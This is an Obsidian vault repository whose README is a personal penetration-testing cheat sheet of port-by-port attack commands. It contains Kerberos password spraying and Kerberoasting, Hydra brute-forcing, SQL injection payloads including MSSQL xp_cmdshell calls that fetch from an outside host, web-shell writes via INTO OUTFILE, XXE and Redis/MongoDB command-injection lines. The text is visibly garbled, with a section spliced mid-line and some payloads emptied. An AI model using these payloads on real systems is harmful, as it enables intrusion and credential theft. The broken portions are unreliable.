├── .obsidian ├── hotkeys.json ├── appearance.json ├── app.json ├── core-plugins.json ├── graph.json └── workspace └── README.md /.obsidian/hotkeys.json: -------------------------------------------------------------------------------- 1 | {} -------------------------------------------------------------------------------- /.obsidian/appearance.json: -------------------------------------------------------------------------------- 1 | { 2 | "baseFontSize": 17, 3 | "theme": "obsidian" 4 | } -------------------------------------------------------------------------------- /.obsidian/app.json: -------------------------------------------------------------------------------- 1 | { 2 | "autoConvertHtml": false, 3 | "spellcheck": false, 4 | "readableLineLength": true, 5 | "legacyEditor": false, 6 | "livePreview": true 7 | } -------------------------------------------------------------------------------- /.obsidian/core-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "file-explorer", 3 | "global-search", 4 | "switcher", 5 | "graph", 6 | "backlink", 7 | "page-preview", 8 | "note-composer", 9 | "command-palette", 10 | "markdown-importer", 11 | "word-count", 12 | "open-with-default-app", 13 | "file-recovery" 14 | ] -------------------------------------------------------------------------------- /.obsidian/graph.json: -------------------------------------------------------------------------------- 1 | { 2 | "collapse-filter": true, 3 | "search": "", 4 | "showTags": false, 5 | "showAttachments": false, 6 | "hideUnresolved": false, 7 | "showOrphans": true, 8 | "collapse-color-groups": true, 9 | "colorGroups": [], 10 | "collapse-display": true, 11 | "showArrow": false, 12 | "textFadeMultiplier": 0, 13 | "nodeSizeMultiplier": 1, 14 | "lineSizeMultiplier": 1, 15 | "collapse-forces": true, 16 | "centerStrength": 0.518713248970312, 17 | "repelStrength": 10, 18 | "linkStrength": 1, 19 | "linkDistance": 250, 20 | "scale": 1, 21 | 
"close": false 22 | } -------------------------------------------------------------------------------- /.obsidian/workspace: -------------------------------------------------------------------------------- 1 | { 2 | "main": { 3 | "id": "617aac7387f32d16", 4 | "type": "split", 5 | "children": [ 6 | { 7 | "id": "97256d3993fdce5f", 8 | "type": "leaf", 9 | "state": { 10 | "type": "markdown", 11 | "state": { 12 | "file": "README.md", 13 | "mode": "preview", 14 | "source": true 15 | } 16 | } 17 | }, 18 | { 19 | "id": "96a13b43f91ad7b5", 20 | "type": "leaf", 21 | "state": { 22 | "type": "markdown", 23 | "state": { 24 | "file": "README.md", 25 | "mode": "source", 26 | "source": true 27 | } 28 | } 29 | } 30 | ], 31 | "direction": "vertical" 32 | }, 33 | "left": { 34 | "id": "e73fa262a9cb682f", 35 | "type": "split", 36 | "children": [ 37 | { 38 | "id": "a6372e08144ad9ec", 39 | "type": "tabs", 40 | "children": [ 41 | { 42 | "id": "81b75c4dbf8d2c16", 43 | "type": "leaf", 44 | "state": { 45 | "type": "file-explorer", 46 | "state": {} 47 | } 48 | }, 49 | { 50 | "id": "79afb801805f0663", 51 | "type": "leaf", 52 | "state": { 53 | "type": "search", 54 | "state": { 55 | "query": "", 56 | "matchingCase": false, 57 | "explainSearch": false, 58 | "collapseAll": false, 59 | "extraContext": false, 60 | "sortOrder": "alphabetical" 61 | } 62 | } 63 | } 64 | ] 65 | } 66 | ], 67 | "direction": "horizontal", 68 | "width": 100 69 | }, 70 | "right": { 71 | "id": "0278797736506062", 72 | "type": "split", 73 | "children": [ 74 | { 75 | "id": "c5678486e4db8946", 76 | "type": "tabs", 77 | "children": [ 78 | { 79 | "id": "16a05e20564b624a", 80 | "type": "leaf", 81 | "state": { 82 | "type": "backlink", 83 | "state": { 84 | "file": "README.md", 85 | "collapseAll": false, 86 | "extraContext": false, 87 | "sortOrder": "alphabetical", 88 | "showSearch": false, 89 | "searchQuery": "", 90 | "backlinkCollapsed": false, 91 | "unlinkedCollapsed": true 92 | } 93 | } 94 | } 95 | ] 96 | } 97 | ], 98 | 
"direction": "horizontal", 99 | "width": 300, 100 | "collapsed": true 101 | }, 102 | "active": "96a13b43f91ad7b5", 103 | "lastOpenFiles": [ 104 | "README.md" 105 | ] 106 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | z# EzpzCheatSheet 2 | This CheatSheet will not have much explanation. It just a commands that has been used pwning all of the machines from various platform and something that I have encounter before. Also any notes, CTF and others that help me. 3 | 4 | Also, do check this notes here [https://github.com/aniqfakhrul/archives](https://github.com/aniqfakhrul/archives) ! 5 | 6 | # A. Ports 7 | 8 | ### Port 21 (FTP) 9 | 10 | ```bash 11 | => Commands 12 | $ wget -m --no-passive ftp://anonymous:anonymous@10.10.10.10 13 | $ ftp 10.10.10.10 5581 14 | ``` 15 | 16 | ### Port 22 (SSH) 17 | 18 | ```bash 19 | => Install 20 | $ sudo apt install openssh-server 21 | 22 | => Commands 23 | $ ssh root@10.10.10.10 24 | $ ssh root@10.10.10.10 -i id_rsa 25 | 26 | => Nmap 27 | 28 | 29 | => Service 30 | $ sudo systemctl status ssh 31 | $ sudo systemctl enable ssh 32 | $ sudo systemctl start ssh 33 | 34 | => References 35 | $ https://www.cyberciti.biz/faq/ubuntu-linux-install-openssh-server/ 36 | ``` 37 | 38 | ### Port 25 (SMTP) 39 | 40 | ```bash 41 | => Nmap 42 | $ 43 | 44 | => Enum Users 45 | $ smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 10.10.10.10 46 | 47 | => Swaks (Send Email) 48 | $ swaks --to nik@bank.local --from aniq@bank.local --header "Subject: Welcome" --body "Enjoy your stay!" 
--server 10.10.10.10 49 | ``` 50 | 51 | ### Port 53 (DNS) 52 | 53 | ```bash 54 | => Install 55 | $ sudo apt install dnsutils 56 | 57 | => Nmap 58 | $ nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" 10.10.10.10 59 | 60 | => Nslookup 61 | $ nslookup 10.10.10.10 62 | * server 10.10.10.10 63 | * 10.10.10.10 64 | 65 | => Dig 66 | $ dig bank.local axfr @10.10.10.10 67 | 68 | => Host 69 | $ host -t ns megacorpone.com 70 | ``` 71 | 72 | ### Port 80 (Http) 73 | 74 | ```bash 75 | => Install Apache2 76 | $ sudo apt install apache2 77 | 78 | => Service 79 | $ sudo systemctl status apache2 80 | $ sudo systemctl enable apache2 81 | $ sudo systemctl start apache2 82 | 83 | => References 84 | $ https://www.digitalocean.com/community/tutorials/how-to-install-the-apache-web-server-on-ubuntu-20-04 85 | ``` 86 | 87 | ### Port 88 (Kerberos) 88 | 89 | ```bash 90 | => Nmap 91 | 92 | 93 | => Enumerate Users 94 | $ kerbrute userenum -d bank.local --dc 10.10.10.10 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt 95 | 96 | => Bruteforce User 97 | $ kerbrute bruteuser -d bank.local --dc 10.10.10.10 rockyou.txt nik 98 | 99 | => Passwword Spray 100 | $ kerbrute passwordspray -d bank.local --dc 10.10.10.10 user.txt 'Password@123!' 101 | 102 | => Kerberoasting 103 | $ GetUserSPNs.py bank.local/nik:'Password@123!' -dc-ip 10.10.10.10 -request -outputfile output.txt 104 | $ 13100 hashcat mode 105 | 106 | => bloodhound-python 107 | $ bloodhound-python -u 'nik' -p 'Password@123!' 
-d 'bank.local' -ns 10.10.10.10 108 | $ bloodhound-python -u 'nik' --hashes 'aad3b435b51404eeaad3b435b51404ee:f220d3988deb3f516c73f40ee16c431d' -d 'bank.local' -ns 10.10.10.10 109 | ``` 110 | 111 | ### Port 110 , 995 (POP3) 112 | 113 | ```bash 114 | => Nmap 115 | 116 | => Banner Grabbing 117 | $ nc -nv 10.10.10.10 110 118 | $ openssl s_client -connect 10.10.10.10:995 -crlf -quiet 119 | 120 | => Connect 121 | $ telnet 10.10.10.10 110 122 | * USER nik 123 | * PASS Password@123! 124 | * list 125 | * retr 1 126 | * quit 127 | ``` 128 | 129 | ### Port 135 , 593 (RPC) 130 | 131 | ```bash 132 | => Nmap 133 | 134 | => Rpcclient 135 | $ rpcclient -U '' -N 10.10.10.10 136 | 137 | => Rpcclient Commands 138 | $ enumdomusers 139 | $ netshareenum 140 | $ netshareenumall 141 | $ srvinfo 142 | $ queryuser 500 143 | $ querydispinfo 144 | $ enumdomains 145 | $ enumprivs 146 | 147 | ``` 148 | 149 | ### Port 139,445 (SMB) 150 | 151 | ```bash 152 | => Install 153 | $ sudo apt install samba 154 | 155 | => Service 156 | $ sudo systemctl status smbd 157 | $ sudo systemctl start smbd 158 | $ sudo systemctl stop smbd 159 | 160 | => Configuration file 161 | $ /etc/samba/smb.conf 162 | $ sudo smbpasswd -a username 163 | 164 | => Nmap 165 | $ nmap --script "safe or smb-enum-*" -p 445 10.10.10.10 166 | $ nmap --script smb-vuln* -p 137,139,445 10.10.10.10 167 | 168 | => Smbmap 169 | $ smbmap -H 10.10.10.10 170 | $ smbmap -H 10.10.10.10 -u raj -p 123 171 | $ smbmap -H 10.10.10.10 -P 139 172 | 173 | => Smbclient 174 | $ smbclient -L 10.10.10.10 175 | $ smbclient -N \\\\10.10.10.10\\Users -c "prompt OFF;recurse ON;mget *" 176 | $ smbclient -N \\\\10.10.10.10\\Users -c "prompt OFF;recurse ON;ls" 177 | $ smbclient -U 'nik' \\\\10.10.10.10\\Data -c "prompt OFF;recurse ON;mget *" 'Password@123!' 178 | $ smbclient -U 'nik' \\\\10.10.10.10\\Data -c "prompt OFF;recurse ON;ls" 'Password@123!' 179 | $ smbclient -U 'nik' \\\\10.10.10.10\\Data -c "get \Windows\test.txt" 'Password@123!' 
-t 10000 180 | 181 | => Smbget 182 | $ smbget -R smb://10.10.10.10/users$/nik/nik.xml -U 'nik' 183 | 184 | => Crackmapexec 185 | $ crackmapexec smb --gen-relay-list targets.txt 10.10.10.0/24 186 | $ crackmapexec smb 10.10.10.10 -u 'nik' -p 'Password@123!' -X whoami --amsi-bypass /tmp/amsiibypass 187 | $ crackmapexec smb 10.10.10.10 -u 'nik' -p 'Password@123!' -x whoami 188 | $ crackmapexec smb 10.10.10.10 -u 'nik' -H hash_uniq.txt 189 | 190 | => Enum4linux 191 | $ enum4linux 10.10.10.10 192 | $ enum4linux -u "user" -p "password" -a 10.10.10.10 193 | $ for i in $(cat list.txt); do enum4linux -a $i;done 194 | 195 | 196 | => References 197 | $ https://ubuntu.com/tutorials/install-and-configure-samba 198 | ``` 199 | 200 | ### 143,993 (IMAP) 201 | 202 | ```bash 203 | => Nmap 204 | $ nmap -sV --script imap-brute -p 143 10.10.10.10 205 | ``` 206 | 207 | ### Port 161, 162 (SNMP - UDP) 208 | 209 | ```bash 210 | => Install 211 | $ pip install snmpclitools 212 | $ sudo apt-get install snmp-mibs-downloader 213 | 214 | => Snmp-check 215 | $ snmp-check 10.10.10.10 -c public 216 | 217 | => Snmpwalk 218 | $ snmpwalk -v1 -c public 10.10.10.10 219 | $ snmpwalk -c public 10.10.10.10 220 | $ snmpwalk -v1 -c public 10.10.10.10 1 221 | $ snmpwalk -v1 -c public 10.10.10.10 2 222 | $ snmpwalk -v 1 -c public 10.10.10.10 NET-SNMP-EXTEND-MIB::nsExtendOutputFull 223 | $ snmpwalk -m +MY-MIB -v 2c -c public 10.10.10.10 nsExtendObjects 224 | $ snmpwalk -m +MY-MIB -v 1 -c public 10.10.10.10 nsExtendObjects 225 | $ snmpwalk -m ALL -v 2c -c public 10.10.10.10 nsExtendObjects 226 | 227 | => Onesixtyone 228 | $ onesixtyone -c /path/to/seclists/Discovery/SNMP/snmp-onesixtyone.txt -i ip.txt 229 | ``` 230 | 231 | ### Port 623 (IPMI - UDP) 232 | 233 | ```bash 234 | => Nmap 235 | $ nmap -n-sU -p 623 10.10.10.10 236 | 237 | => Metasploit 238 | $ use auxiliary/scanner/ipmi/ipmi_cipher_zero 239 | $ use auxiliary/scanner/ipmi/ipmi_version 240 | 241 | => Authentication Bypass Cipher 0 242 | $ ipmitool -I 
lanplus -C 0 -H 10.10.10.10 -U Username -P Password user list   # with cipher suite 0 the BMC skips the password check, so -P can be anything, but -U must be an existing account
-b 'DC=bank,DC=local' "(userAccountControl:1.2.840.113556.1.4.803:=524288)" samaccountname   # 524288 = TRUSTED_FOR_DELEGATION (unconstrained delegation)
332 | ```bash 333 | => Nmap 334 | $ nmap -sV --script=nfs-showmount 335 | 336 | => Showmount 337 | $ showmount -e 10.10.10.10 338 | 339 | => Mount 340 | $ mount -t nfs 10.10.10.10:/home mnt 341 | $ mount -o vers=3 -t nfs 10.10.10.10:/home mnt 342 | ``` 343 | 344 | ### 3128 (SQUID PROXY) 345 | 346 | ```bash 347 | => Ffuf 348 | $ ffuf -u 'http://10.10.10.10/FUZZ' -w common.txt:FUZZ -x http://10.10.10.10:3128 349 | 350 | => proxychains 351 | $ echo "http 10.10.10.10 3128" >> /etc/proxychains.conf 352 | * proxychains ssh john@10.10.10.10 353 | ``` 354 | 355 | ### 3306 (MYSQL) 356 | 357 | ```bash 358 | => Commands 359 | $ mysql -u root -p -h 10.10.10.10 360 | $ mysql -u root -pPassword123 -e "use drupal;select * from users" 361 | 362 | => Bruteforce 363 | $ hydra -l nik -p password.txt 10.10.10.10 mysql -t 30 -f 364 | 365 | => Check UDF 366 | $ select * from msql.func; 367 | 368 | => Mysql Commands 369 | $ select sys_exec('whoami'); 370 | ``` 371 | 372 | ### 3389 (RDP) 373 | 374 | ```bash 375 | => Nmap 376 | $ nmap -p 3389 --script=rdp-vuln-* 10.10.10.10 377 | 378 | => Commands 379 | $ xfreerdp /u:nik /p:'Password@123!' 
/cert:ignore /v:10.10.10.10 380 | $ xfreerdp /u:admin /p:password /cert:ignore /v:10.10.10.10 /drive:share_mount,/opt/folder_to_mount 381 | $ rdesktop -a 16 -z -u admin -p password 10.10.10.10 382 | $ rdesktop -f -u "" 10.10.10.10 383 | 384 | => References 385 | $ https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ 386 | ``` 387 | 388 | ### 3632 (DISTCC) 389 | 390 | ```bash 391 | => Nmap 392 | $ nmap -p 3632 10.10.10.10 --script distcc-exec --script-args="distcc-exec.cmd='id'" 393 | 394 | ``` 395 | 396 | ### Port 6379 (REDIS) 397 | 398 | ```bash 399 | => Install 400 | $ sudo apt-get install redis-tools 401 | 402 | => Commands 403 | $ redis-cli -h 10.10.10.10 404 | * keys * 405 | * get pk:ids:User 406 | * info 407 | * client list 408 | * CONFIG GET * 409 | $ redis-cli -h 10.10.10.10 -p 6379 eval "dofile('//10.10.11.1//share')" 0 410 | $ redis-cli -h 10.10.10.10 -p 6379 eval "dofile('/etc/passwd')" 0 411 | 412 | => redis-dump-go 413 | $ https://github-com.translate.goog/yannh/redis-dump-go 414 | 415 | => Downloads 416 | $ https://download.redis.io/releases/ 417 | 418 | => References 419 | $ https://book.hacktricks.xyz/pentesting/6379-pentesting-redis 420 | ``` 421 | 422 | ### Port 8086 (InfluxDB) 423 | 424 | ```bash 425 | => User Enumeration 426 | $ http://127.0.0.1:8086/debug/requests 427 | 428 | => Usage 429 | $ curl -G "http://10.10.10.10:8086/query?pretty=true" -H "Authorization: Bearer " --data-urlencode "q=show databases" 430 | $ curl -G "http://10.10.10.10:8086/query?pretty=true" -H "Authorization: Bearer " --data-urlencode "db=database" --data-urlencode "q=select * from \"tables\"" 431 | $ curl -G "http://10.10.133.227:8086/query?pretty=true" -H "Authorization: Bearer " --data-urlencode "db=database" --data-urlencode "q=select * from times" --data-urlencode "epoch=s" 432 | 433 | => Commands 434 | $ show databases 435 | $ show measurements 436 | $ show users 437 | $ select * from tables 438 | 439 | => References 440 | $ 
https://www.komodosec.com/post/when-all-else-fails-find-a-0-day 441 | $ https://docs.influxdata.com/influxdb/v1.8/administration/authentication_and_authorization/ 442 | ``` 443 | 444 | ### 27017,27018 (MONGODB) 445 | 446 | ```bash 447 | => Commands 448 | $ mongo localhost:27017/myplace -u nik -p Password123 449 | * show dbs 450 | * use 451 | * show collections 452 | * db..find() 453 | * db..insert( { _id: 1, cmd: "curl 10.10.14.4/test"} ) 454 | ``` 455 | 456 | # B. Tools/Techniques 457 | 458 | ### Nali 459 | 460 | ```bash 461 | # Download/Install 462 | https://github.com/zu1k/nali 463 | go get -u -v github.com/zu1k/nali 464 | 465 | # Usage 466 | echo 6.6.6.6 | nali 467 | nali 1.2.3.4 468 | nali 1.2.3.4 4.3.2.1 123.23.3.0 469 | nslookup nali.lgf.im 8.8.8.8 | nali 470 | nslookup google.com | nali 471 | 472 | ``` 473 | 474 | ### Port Knocking 475 | ```bash 476 | => Commands 477 | $ knocker.py -p 8890,7000,666 10.10.10.10 478 | $ for i in 571 290 911;do nmap -n -v0 -Pn --max-retries 0 -p $i 10.10.10.10;done 479 | $ knock 10.10.10.10 7000:666:8890 480 | 481 | => Permutation (Port) 482 | $ python -c 'import itertools; print list(itertools.permutations(\[8890,7000,666\]))' | sed 's/), /\\n/g' | tr -cd '0-9,\\n' | sort | uniq > permutation.txt 483 | 484 | ``` 485 | 486 | ### Port Scanning 487 | 488 | ```bash 489 | # No netstat or lsof 490 | $ declare -a array=($(tail -n +2 /proc/net/tcp | cut -d":" -f"3"|cut -d" " -f"1")) && for port in ${array[@]}; do echo $((0x$port)); done 491 | $ declare -a array=($(tail -n +2 /proc/net/tcp | cut -d":" -f"3"|cut -d" " -f"1")) && for port in ${array[@]}; do echo $((0x$port)); done | sort | uniq 492 | $ https://www.commandlinefu.com/commands/view/15313/check-open-ports-without-netstat-or-lsof 493 | 494 | # Another Port Scanning 495 | $ for i in {1..65535};do (echo < /dev/tcp/127.0.0.1/$i) &>/dev/null && printf "\n[+] Open Port at\n: \t%d\n" "$i" || printf "."; done 496 | ``` 497 | 498 | ### Curl Commands 499 | 500 | ```bash 501 | # 
Commands 502 | $ curl -XGET -G -b 'PHPSESSID=cnc4ofdvpm1770nodu7lcbte46' 'http://localhost/tracks.php' --data-urlencode "id=9999 union select 1,database(),3-- -" 503 | ``` 504 | 505 | ### Shodan 506 | 507 | ```bash 508 | # Install 509 | easy_install shodan 510 | 511 | # Commands 512 | shodan init " Get Current Database 523 | $ database() 524 | 525 | => Get Database 526 | $ UNION SELECT table_schema FROM information_schema.tables 527 | 528 | => Get Table Name 529 | $ UNION SELECT table_name FROM information_schema.tables WHERE table_schema == "database" 530 | 531 | => Get Column Name 532 | $ UNION SELECT table_name, column_name FROM information_schema.columns 533 | 534 | => ===Time Based=== 535 | => Get Database 536 | $ (SELECT sleep(5) from dual where substring(database(),1,1)='h') 537 | $ (SELECT sleep(5) from dual where substring(database(),2,1)='h') 538 | 539 | => Get Tables 540 | $ (SELECT sleep(5) from information_schema.tables where table_name LIKE '%hotel%') 541 | 542 | => Get Columns 543 | $ (SELECT sleep(5) from information_schema.columns where column_name LIKE '%room%' AND table_name='hotel') 544 | 545 | => Extract 546 | $ IF((select MID(user,1,1) from mysql.user limit 0,1)='D' , sleep(5),0) 547 | 548 | => Extra 549 | $ (select IF(500>1000, "nothing", sleep(5))) 550 | 551 | => ===Union Based=== 552 | => Get Database 553 | $ 9999 union select 1,database(),3,4,5 554 | 555 | => Get Tables 556 | $ 9999 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema like "%hotel%" 557 | 558 | => Get Columns 559 | $ 9999 union select 1, group_concat(column_name),3,4,5 from information_schema.columns where table_name like "%room%" 560 | 561 | => Extract 562 | $ 9999 union select 1,group_concat(user,":",password),3,4,5 from mysql.user 563 | 564 | => ===Blind=== 565 | [WHERE] 566 | $ ' and password like 'k%'-- 567 | 568 | => Write File 569 | $ Set Global General_Log_File = '/tmp/test.php'; 570 | $ Select ''; 571 | $ select '' into 
outfile 'C:/xampp/htdocs/shell4.php' 572 | 573 | => Read File 574 | $ load_file("/etc/passwd"); 575 | 576 | [ORACLE] 577 | => Get Current Database 578 | $ union SELECT SYS.DATABASE_NAME,'b',1 FROM v$version-- 579 | 580 | => Get All Tables 581 | $ ' union SELECT table_name,'b',1 FROM all_tables-- 582 | 583 | => Get Columns 584 | $ ' union SELECT column_name,'b',1 FROM all_tab_columns WHERE table_name = 'TABLE'-- 585 | 586 | => Extract 587 | $ ' union SELECT USERNAME,'b',1 FROM TABLE-- 588 | $ ' union SELECT USERNAME||':'||PASSWORD,'',1 FROM TABLE-- 589 | 590 | [MSSQL] 591 | => Payload (Encounter Before) 592 | $ A';waitfor delay '0:0:00';-- 593 | $ ' OR 1=1 OR 'A' LIKE 'A 594 | $ ';EXEC master..xp_cmdshell 'powershell.exe -c curl http://10.10.10.10/';-- 595 | $ ';EXEC master..xp_cmdshell 'powershell.exe -c iwr http://10.10.10.10/';-- 596 | 597 | => Check File exist or Not 598 | => Corect Path 599 | $ ';DECLARE @isExists INT ;EXEC xp_fileexist 'C:\windows\win.ini', @isExists OUT Select @isExists;IF(@isExists=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 600 | 601 | => Wrong Path 602 | $ ';DECLARE @isExists INT ;EXEC xp_fileexist 'C:\windows\win2.ini', @isExists OUT Select @isExists;IF(@isExists=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 603 | 604 | => Check Directory/Files Exist Or Not 605 | => Correct 606 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'IF EXIST "C:\windows\" (Exit 1) ELSE (Exit 0)',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 607 | 608 | => Wrong 609 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'IF EXIST "C:\windows2\" (Exit 1) ELSE (Exit 0)',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 610 | 611 | => Check Hostname 612 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(((hostname)[0] -eq [char]67)){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 613 | 614 | => Check APPDATA Path 615 | $ 
';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(($env:APPDATA[0] -eq [char]67)){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 616 | 617 | => Check Substring 618 | => Correct 619 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(((Get-ChildItem -Path C:\ -Force -Directory)[0].fullName[0] -eq [char]67)){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 620 | 621 | => Wrong 622 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(((Get-ChildItem -Path C:\ -Force -Directory)[0].fullName[0] -eq [char]66)){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 623 | 624 | => Powershell IF ELSE 625 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c IF ("1" -eq "1") {EXIT 1} ELSE {EXIT 0}',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 626 | 627 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c IF (1 -eq 1) {EXIT 1} ELSE {EXIT 0}',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 628 | 629 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c IF (echo 1) {EXIT 1} ELSE {EXIT 0}',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 630 | 631 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c IF ( Test-Path C:\ ) {EXIT 1} ELSE {EXIT 0}',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 632 | 633 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(Get-ChildItem -Path C:\){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 634 | 635 | 636 | => Simple IF ELSE 637 | $ ';DECLARE @value INT = 1;IF(@value=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 638 | 639 | => Payload (Enable xp_cmdshell) 640 | $ ';sp_configure 'show advanced 
options', '1';RECONFIGURE;-- 641 | $ ';sp_configure 'xp_cmdshell', '1';RECONFIGURE;-- 642 | 643 | => Time Based 644 | $ ;waitfor delay '0:0:10'-- 645 | $ );waitfor delay '0:0:10'-- 646 | $ ';waitfor delay '0:0:10'-- 647 | $ ');waitfor delay '0:0:10'-- 648 | $ ));waitfor delay '0:0:10'-- 649 | 650 | => References 651 | $ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md 652 | $ https://www.sqlservercentral.com/forums/topic/determining-whether-a-directory-exists-xp_dirtree-xp_subdirs 653 | 654 | [SQLITE] 655 | => Command 656 | $ sqlite3 databse.db 657 | $ .tables 658 | $ select * from user; 659 | $ .schema user 660 | $ UPDATE user SET passwd = "" where id 2; 661 | ``` 662 | 663 | ### XXE Injection 664 | 665 | ``` 666 | => Payload (1) 667 | 668 | ]> 669 | 670 | &xxe; 671 | John 672 | 673 | 674 | => Payload (2) 675 | # send this on the application 676 | 677 | 679 | %ext; 680 | ]> 681 | 682 | 683 | # content of poc.dtd 684 | 685 | "> 686 | %eval; 687 | %error; 688 | 689 | => References 690 | $ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md 691 | ``` 692 | 693 | ### GraphQL Injection 694 | 695 | ```bash 696 | # Introspection 697 | {"query":"{\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n ...FullType\r\n }\r\n directives {\r\n name\r\n description\r\n locations\r\n args {\r\n ...InputValue\r\n }\r\n }\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n ...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n }\r\n }\r\n\r\n fragment InputValue 
on __InputValue {\r\n name\r\n description\r\n type { ...TypeRef }\r\n defaultValue\r\n }\r\n\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }"} 698 | 699 | # Query 700 | {"query":"{\r\n AllNotes\r\n {\r\n id,author,title\r\n }\r\n }"} 701 | 702 | # References 703 | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection 704 | https://apis.guru/graphql-voyager/ 705 | ``` 706 | 707 | 708 | ### Hydra 709 | 710 | ```bash 711 | => Export Proxy 712 | export HYDRA_PROXY=connect://127.0.0.1:8080 713 | 714 | => Install 715 | sudo apt-get install hydra-gtk 716 | 717 | => Commands 718 | hydra -l nik -p rockyou.txt 10.10.10.10 ssh -t 30 -f 719 | hydra -L user.txt -P pass.txt 10.10.10.10 ssh -t 30 -f 720 | hydra -L user.txt -P pass.txt 10.10.10.10 ssh -s 2222 -t 30 -f 721 | 722 | => Json 723 | hydra -l admin -P rockyou.txt localhost http-post-form '/api/login:{"username"\:"^USER^","password"\:"^PASS^","recaptcha"\:""}:Forbidden' -V -f 724 | 725 | => Json (Bypass WAF - User agent Hydra) 726 | hydra -l admin -P rockyou.txt localhost http-post-form '/api/login:{"username"\:"^USER^","password"\:"^PASS^"}:H=User-Agent\: Mozilla/5.0:H=Content-Type\: application/json:F=Wrong credentials' -V -f 727 | 728 | => POST 729 | hydra -l admin -P rockyou.txt 10.10.10.10 -s 30609 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError" 730 | 731 | => GET 732 | hydra -l user -P rockyou.txt 10.10.10.10 http-get / 733 | ``` 734 | 735 | ### KeyHacks 736 | 737 | ``` 738 | # References 739 | https://github.com/streaak/keyhacks 740 | ``` 741 | 742 | ### JsonBrute 743 | 744 | ```bash 745 | # Download 746 | https://github.com/Jake-Ruston/JSONBrute 747 | 748 
